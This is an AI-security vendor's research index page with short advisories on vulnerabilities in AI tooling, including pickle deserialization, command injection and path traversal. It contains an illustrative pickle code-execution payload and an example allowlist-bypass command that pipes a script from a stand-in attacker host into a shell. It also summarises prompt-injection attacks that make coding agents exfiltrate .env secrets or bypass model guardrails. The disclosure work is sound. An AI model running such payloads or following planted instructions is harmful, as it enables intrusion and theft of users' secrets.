Innovation Hub

Featured Posts

Insights

Claude Mythos: AI Security Gaps Beyond Vulnerability Discovery

Insights

Reflections on RSAC 2026: Moving Beyond Messaging and Sponsored Lists to Measurable AI Security

Insights

Securing AI Agents: The Questions That Actually Matter

Get All Our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research

AI Agents in Production: Security Lessons from Recent Incidents

Research

LiteLLM Supply Chain Attack

Research

Exploring the Security Risks of AI Assistants like OpenClaw

Research

Agentic ShadowLogic

Videos

Reports and Guides

Report and Guide

2026 AI Threat Landscape Report

Register today to receive your copy of the report on March 18th and secure your seat for the accompanying webinar on April 8th.

Report and Guide

Securing AI: The Technology Playbook

A practical playbook for securing, governing, and scaling AI applications for technology companies.

Report and Guide

Securing AI: The Financial Services Playbook

A practical playbook for securing, governing, and scaling AI systems in financial services.

HiddenLayer AI Security Research Advisory

CVE-2026-3071

Flair Vulnerability Report

An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.
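
For illustration, the attack class behind this advisory can be shown in a few lines (a hypothetical payload, not Flair's code): any pickled object may define __reduce__ to return a callable that runs at load time, which is why torch.load() with weights_only=False is unsafe on untrusted files.

```python
import os
import pickle

# Hypothetical payload illustrating the vulnerability class: __reduce__
# tells pickle to call os.system during deserialization.
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("echo arbitrary code execution",))

blob = pickle.dumps(MaliciousPayload())
pickle.loads(blob)  # executes the payload immediately on load
```

Passing weights_only=True to torch.load() restricts deserialization to tensors and primitive containers, rejecting payloads like the one above.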

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode, Cursor checks commands sent to run in the terminal against a list of specifically allowed commands. The checking function contains a logic flaw that allows an attacker to craft a command that executes non-allowed commands.
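
The advisory does not reproduce Cursor's exact check, but the vulnerability class can be sketched with a hypothetical allowlist that inspects only the first token of a command, leaving anything chained after a shell operator unexamined:

```python
ALLOWLIST = {"ls", "cat", "git"}  # hypothetical allowlist, for illustration only

def naive_is_allowed(command: str) -> bool:
    # Flawed check: only the first whitespace-separated token is validated,
    # so commands chained behind shell operators are never inspected.
    first_token = command.strip().split()[0]
    return first_token in ALLOWLIST

# Passes the check, yet a shell would also run the curl payload:
print(naive_is_allowed("ls && curl attacker.example/payload.sh | sh"))  # True
```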

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.
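
A common mitigation for this class of bug (a generic sketch, not Windsurf's actual fix) is to resolve every user-supplied path and verify it stays inside the project root before any read or write:

```python
from pathlib import Path

def resolve_inside(project_root: str, user_path: str) -> Path:
    """Resolve user_path and refuse anything outside project_root."""
    root = Path(project_root).resolve()
    target = (root / user_path).resolve()  # collapses any ../ segments
    if not target.is_relative_to(root):  # Python 3.9+
        raise ValueError(f"path escapes project root: {user_path}")
    return target

# resolve_inside("/home/user/project", "src/main.py")       -> allowed
# resolve_inside("/home/user/project", "../../etc/passwd")  -> ValueError
```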

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions in a project file that read sensitive data from other project files (such as a .env file) and insert it into web requests for exfiltration.

In the News

News

HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

News

HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

News

HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

Insights

RSAC 2025 Takeaways

RSA Conference 2025 may be over, but conversations are still echoing about what’s possible with AI and what’s at risk. This year’s theme, “Many Voices. One Community,” reflected the growing understanding that AI security isn’t a challenge one company or sector can solve alone. It takes shared responsibility, diverse perspectives, and purposeful collaboration.

Insights

Universal Bypass Discovery: Why AI Systems Everywhere Are at Risk

HiddenLayer researchers have developed the first single, universal prompt injection technique (effective post-instruction hierarchy) that successfully bypasses safety guardrails across nearly all major frontier AI models. This includes models from OpenAI (GPT-4o, GPT-4o-mini, and even the newly announced GPT-4.1), Google (Gemini 1.5, 2.0, and 2.5), Microsoft (Copilot), Anthropic (Claude 3.7 and 3.5), Meta (Llama 3 and 4 families), DeepSeek (V3, R1), Qwen (2.5 72B), and Mixtral (8x22B).

Insights

How To Secure Agentic AI

Artificial Intelligence is entering a new chapter defined not just by generating content but by taking independent, goal-driven action. This evolution is called agentic AI. These systems don’t simply respond to prompts; they reason, make decisions, invoke tools, and carry out tasks across systems, all with limited human oversight. In short, they are the architects of their own workflows.

Insights

What’s New in AI

The past year brought significant advancements in AI across multiple domains, including multimodal models, retrieval-augmented generation (RAG), humanoid robotics, and agentic AI.

Insights

Securing Agentic AI: A Beginner's Guide

The rise of generative AI has unlocked new possibilities across industries, and among the most promising developments is the emergence of agentic AI. Unlike traditional AI systems that respond to isolated prompts, agentic AI systems can plan, reason, and take autonomous action to achieve complex goals.

Insights

AI Red Teaming Best Practices

Organizations deploying AI must ensure resilience against adversarial attacks before models go live. This blog covers best practices for AI red teaming (https://hiddenlayer.com/innovation-hub/a-guide-to-ai-red-teaming/), drawing on industry frameworks and insights from real-world engagements by HiddenLayer’s Professional Services team.

Insights

AI Security: 2025 Predictions & Recommendations

It’s time to dust off the crystal ball once again! Over the past year, AI has truly been at the forefront of cybersecurity, with increased scrutiny from attackers, defenders, developers, and academia. As various forms of generative AI drive mass AI adoption, we find that the threats are not lagging far behind, with LLMs, RAG, agentic AI, integrations, and plugins being hot topics for researchers and miscreants alike.

Insights

Securely Introducing Open Source Models into Your Organization

Open source models are powerful tools for data scientists, but they also come with risks. If your team downloads models from sources like Hugging Face without security checks, you could introduce security threats into your organization. You can mitigate this risk by introducing a process that scans models for vulnerabilities before they enter your organization and are used by data scientists. By combining HiddenLayer's Model Scanner with your CI/CD platform, you can ensure that only safe models are used. In this blog, we'll walk you through how to set up a system where data scientists request models, security checks run automatically, and approved models are stored in a safe location like cloud storage, a model registry, or Databricks Unity Catalog.
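
As a rough sketch of the gating step (the scanner command and flags below are placeholders, not HiddenLayer's actual interface), a CI job can refuse to promote any model that fails the scan:

```python
import subprocess
import sys

MODEL_PATH = "downloads/requested-model"  # hypothetical staging path

def model_is_clean(path: str) -> bool:
    # Placeholder CLI invocation; substitute your scanner's real command.
    result = subprocess.run(["model-scanner", "--path", path])
    return result.returncode == 0

if __name__ == "__main__":
    if not model_is_clean(MODEL_PATH):
        print("Model failed the security scan; blocking promotion.", file=sys.stderr)
        sys.exit(1)
    print("Model passed; promote to cloud storage, a registry, or Unity Catalog.")
```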

Insights

Enhancing AI Security with HiddenLayer’s Refusal Detection

Security risks in AI applications are not one-size-fits-all. A system processing sensitive customer data presents vastly different security challenges compared to one that aggregates internet data for market analysis. To effectively safeguard an AI application, developers and security professionals must implement comprehensive mechanisms that instruct models to decline contextually malicious requests—such as revealing personally identifiable information (PII) or ingesting data from untrusted sources. Monitoring these refusals provides an early and high-accuracy warning system for potential malicious behavior.
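
As a deliberately simplified illustration (a real refusal detector is a trained classifier, not a keyword list), monitoring could flag responses that match common refusal phrasings and count them per session:

```python
import re

# Toy stand-in for a refusal detector, for illustration only.
REFUSAL_PATTERNS = [
    r"\bI can(?:'|no)t help with\b",
    r"\bI(?:'m| am) unable to\b",
    r"\bagainst (?:my|our) (?:policy|guidelines)\b",
]

def looks_like_refusal(response: str) -> bool:
    return any(re.search(p, response, re.IGNORECASE) for p in REFUSAL_PATTERNS)

refusals_per_session: dict[str, int] = {}

def record(session_id: str, response: str) -> None:
    # A spike in refusals from one session is an early signal of probing.
    if looks_like_refusal(response):
        refusals_per_session[session_id] = refusals_per_session.get(session_id, 0) + 1
```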

Insights

Why Revoking Biden’s AI Executive Order Won’t Change Course for CISOs

On 20 January 2025, President Donald Trump rescinded former President Joe Biden’s 2023 executive order on artificial intelligence (AI), which had established comprehensive guidelines for developing and deploying AI technologies. While this action signals a shift in federal policy, its immediate impact on the AI landscape is minimal for several reasons.

Insights

HiddenLayer Achieves ISO 27001 and Renews SOC 2 Type 2 Compliance

Security compliance is more than just a checkbox - it’s a fundamental requirement for protecting sensitive data, building customer trust, and ensuring long-term business growth. At HiddenLayer, security has always been at the core of our mission, and we’re proud to announce that we have achieved SOC 2 Type 2 and ISO 27001 compliance. These certifications reinforce our commitment to providing our customers with the highest level of security and reliability.

Insights

AI Risk Management: Effective Strategies and Framework

Artificial Intelligence (AI) is no longer just a buzzword—it’s a cornerstone of innovation across industries. However, with great potential comes significant risk. Effective AI Risk Management is critical to harnessing AI’s benefits while minimizing vulnerabilities. From data breaches to adversarial attacks, understanding and mitigating risks ensures that AI systems remain trustworthy, secure, and aligned with organizational goals.

Webinars

Offensive and Defensive Security for Agentic AI

Webinars

How to Build Secure Agents

Webinars

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

Webinars

HiddenLayer Webinar: 2024 AI Threat Landscape Report

Webinars

HiddenLayer Model Scanner

Webinars

HiddenLayer Webinar: A Guide to AI Red Teaming

Webinars

HiddenLayer Webinar: Accelerating Your Customer's AI Adoption

Webinars

HiddenLayer: AI Detection Response for GenAI

Webinars

HiddenLayer Webinar: Women Leading Cyber

Research

AI Agents in Production: Security Lessons from Recent Incidents

Research

LiteLLM Supply Chain Attack

Research

Exploring the Security Risks of AI Assistants like OpenClaw

Research

Agentic ShadowLogic

Research

MCP and the Shift to AI Systems

Research

The Lethal Trifecta and How to Defend Against It

Research

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

Research

Same Model, Different Hat

Research

The Expanding AI Cyber Risk Landscape

Research

The First AI-Powered Cyber Attack

Research

Prompts Gone Viral: Practical Code Assistant AI Viruses

Research

Persistent Backdoors

Report and Guide

2026 AI Threat Landscape Report

Report and Guide

Securing AI: The Technology Playbook

Report and Guide

Securing AI: The Financial Services Playbook

Report and Guide

AI Threat Landscape Report 2025

Report and Guide

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide

A Step-By-Step Guide for CISOs

Report and Guide

AI Threat Landscape Report 2024

Report and Guide

HiddenLayer and Intel eBook

Report and Guide

Forrester Opportunity Snapshot

Report and Guide

Gartner® Report: 3 Steps to Operationalize an Agentic AI Code of Conduct for Healthcare CIOs

News

HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

News

HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

News

HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

News

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

News

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

News

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

News

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

News

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

News

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

News

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

News

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

News

One Prompt Can Bypass Every Major LLM’s Safeguards

SAI Security Advisory

Pickle Load in Serialized Profile Load

An attacker can create a maliciously crafted ydata-profiling report containing code of their choosing and share it with a victim. When the victim loads the report, the code will be executed on their system.

SAI Security Advisory

Model Deserialization Leads to Code Execution

An attacker can create a maliciously crafted model containing an OperatorFuncNode and share it with a victim. If the victim is using Python 3.11 or later and loads the malicious model, arbitrary code will execute on their system.

SAI Security Advisory

Command Injection in CaptureDependency Function

A command injection vulnerability exists in the capture_dependencies function of the AWS SageMaker util file. If a user’s code calls this util function, an attacker can leverage the vulnerability to run arbitrary commands on the system running the code by injecting a system command into the string passed to the function.
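
The underlying pattern (a generic sketch, not SageMaker's exact code) is a user-controlled string interpolated into a shell command; passing an argument vector instead keeps the shell out of the path:

```python
import subprocess

def capture_unsafe(requirement: str) -> None:
    # Vulnerable pattern: shell=True plus string interpolation means input
    # like "requests; rm -rf ~" runs a second, attacker-chosen command.
    subprocess.run(f"pip download {requirement}", shell=True)

def capture_safe(requirement: str) -> None:
    # Safer: an argument vector with no shell; metacharacters in the
    # requirement string are passed through as literal text.
    subprocess.run(["pip", "download", requirement])
```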

SAI Security Advisory

Unsafe Pickle Load in NumpyDeserializer

An attacker can inject a malicious pickle object into a NumPy file and share it with a victim. When the victim loads it with the NumpyDeserializer.deserialize function in the base_deserializers Python file, the allow_pickle optional argument can be set to False and passed to np.load, which loads the file safely. By default, however, the parameter was set to True, so unless the victim specifically changed it, the malicious pickle object would be loaded and executed.
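
On the consuming side, the mitigation is a one-line change (shown generically here, with a hypothetical file name):

```python
import numpy as np

# Safe: object arrays are refused, so an embedded pickle payload cannot run.
data = np.load("untrusted.npy", allow_pickle=False)

# Unsafe on untrusted input: object arrays are unpickled on load, executing
# whatever code a crafted payload embeds.
# data = np.load("untrusted.npy", allow_pickle=True)
```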

SAI Security Advisory

R-bitrary Code Execution Through Deserialization Vulnerability

An attacker could leverage the R Data Serialization format to insert arbitrary code into an RDS-formatted file, or into an R package as an RDX or RDB component, which will be executed when referenced or loaded with readRDS. This is possible because of the lazy evaluation process used in the unserialize function of the R programming language.

SAI Security Advisory

Out of bounds read due to lack of string termination in assert

An attacker can create a malicious ONNX model that fails an assert statement in a way that prints an error string of 2048 characters or more, and share it with a victim. When the victim tries to load the ONNX model, the resulting string leaks program memory.

SAI Security Advisory

Path sanitization bypass leading to arbitrary read

An attacker can create a malicious ONNX model containing paths to externally located tensors and share it with a victim. When the victim tries to load the externally located tensors, a directory traversal attack can occur, allowing an arbitrary read on the victim’s system and resulting in information disclosure.

SAI Security Advisory

Web Server Renders User HTML Leading to XSS

An attacker can provide a URL rather than uploading an image to the Debug Samples tab of an Experiment. If the URL has the extension .html, the web server retrieves the HTML page, which is assumed to contain trusted data. The HTML is marked as safe and rendered on the page, resulting in arbitrary JavaScript running in any user’s browser when they view the samples tab.

SAI Security Advisory

Cross-Site Request Forgery in ClearML Server

An attacker can craft a malicious web page that triggers a cross-site request forgery (CSRF) when visited. When a user browses to the malicious web page, a request is sent that can allow the attacker to fully compromise the user’s account.

SAI Security Advisory

Improper Auth Leading to Arbitrary Read-Write Access

An attacker can, due to lack of authentication, arbitrarily upload, delete, modify, or download files on the fileserver, even if the files belong to another user.

SAI Security Advisory

Path Traversal on File Download

An attacker can upload or modify a dataset containing a link pointing to an arbitrary file and a target file path. When a user interacts with this dataset, such as when using the Dataset.squash method, the file is written to the target path on the user’s system.

SAI Security Advisory

Pickle Load on Artifact Get

An attacker can create a pickle file containing arbitrary code and upload it as an artifact to a Project via the API. When a victim user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.
